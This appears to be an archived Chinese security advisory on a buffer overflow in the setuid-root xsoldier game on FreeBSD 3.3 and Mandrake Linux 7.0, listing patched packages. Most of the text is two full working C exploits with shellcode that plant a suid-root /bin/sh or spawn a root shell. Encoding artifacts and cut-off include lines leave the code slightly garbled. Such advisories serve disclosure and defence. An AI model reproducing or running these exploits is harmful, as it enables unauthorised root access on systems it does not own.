FreeBSD和 Linux Mandrake xsoldier缓冲溢出发布时间:2000-09-15 更新时间:2000-09-15 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 FreeBSD FreeBSD 3.3;MandrakeSoft Linux Mandrake 7.0详细描述 FREEBSD3.3和MANDRAKE自带的X11游戏软件包存在漏洞,其程序是以SUID ROOT身份安装的,可以导致被攻击者获得 ROOT权限,缓冲溢出的问题出在处理显示选项中,当用户提供超长的字符串时出现问题。 测试代码 /* = * xsoldier exploit for Freebsd-3.3-RELEASE * Drops a suid root shell in /bin/sh * Brock Tellier btellier@usa.net */ #include char shell[]=3D /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; char cc[100]; fp =3D fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } main (int argc, char *argv[] ) { int x =3D 0; int y =3D 0; int offset =3D 0; int bsize =3D 4400; char buf[bsize]; int eip =3D 0xbfbfdb65; /* works for me */ buildui(); if (argv[1]) { = offset =3D atoi(argv[1]); eip =3D eip + offset; } fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n"); fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsi= ze); = for ( x =3D 0; x < 4325; x++) buf[x] =3D 0x90; fprintf(stderr, "NOPs to %d\n", x); = for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y]; fprintf(stderr, "Shellcode to %d\n",x); = buf[x++] =3D eip & 0x000000ff; buf[x++] =3D (eip & 0x0000ff00) >> 8; buf[x++] =3D (eip & 0x00ff0000) >> 16; buf[x++] =3D (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize]=3D'\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); } /*Larry W. Cashdollar linux xsolider exploit. *lwc@vapid.dhs.org http://vapid.dhs.org *if xsolider is built and installed from its source it will be installed *setuid root in /usr/local/games *original exploit found by brock tellier for freebsd 3.3 ports packages. *If a setregid() call is placed in the shellcode, you can get egid=12 *with the default mandrake installation.*/ #include #include #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 4480 /*our buffersize. */ char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */ "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i, offset; long retaddr = get_sp (); if (argc <= 1) offset = 0; else offset = atoi (argv[1]); /*#Copy the NOPs in to the buffer leaving space for shellcode and #pointers*/ for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP; /*[NNNNNNNNNNNNNNNNNNNNN ]*/ /* ^-- LEN -(strlen(shellcode)) - 35*/ /*#Copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/ /* ^-(buffer+i) */ /*#Fill the buffer with our new address to jump to esp + offset */ for (i = i + strlen (shellcode); i < LEN; i += 4) *(long *) &buffer[i] = retaddr+offset; /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/ /* ^-(i+strlen(shellcode))*/ printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN); execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0); } 解决方案 请安装一下的补丁:a3836c0ef3c2e7630d80e2426f03d6a9 xsoldier-0.96-13mdk.i586.rpm 0d79b8ab9cfc4278380537bfda8da6ba xsoldier-0.96-13mdk.src.rpm 可以到下面的FTP站点下载: http://www.linux-mandrake.com/en/ftp.php3 相关信息 |
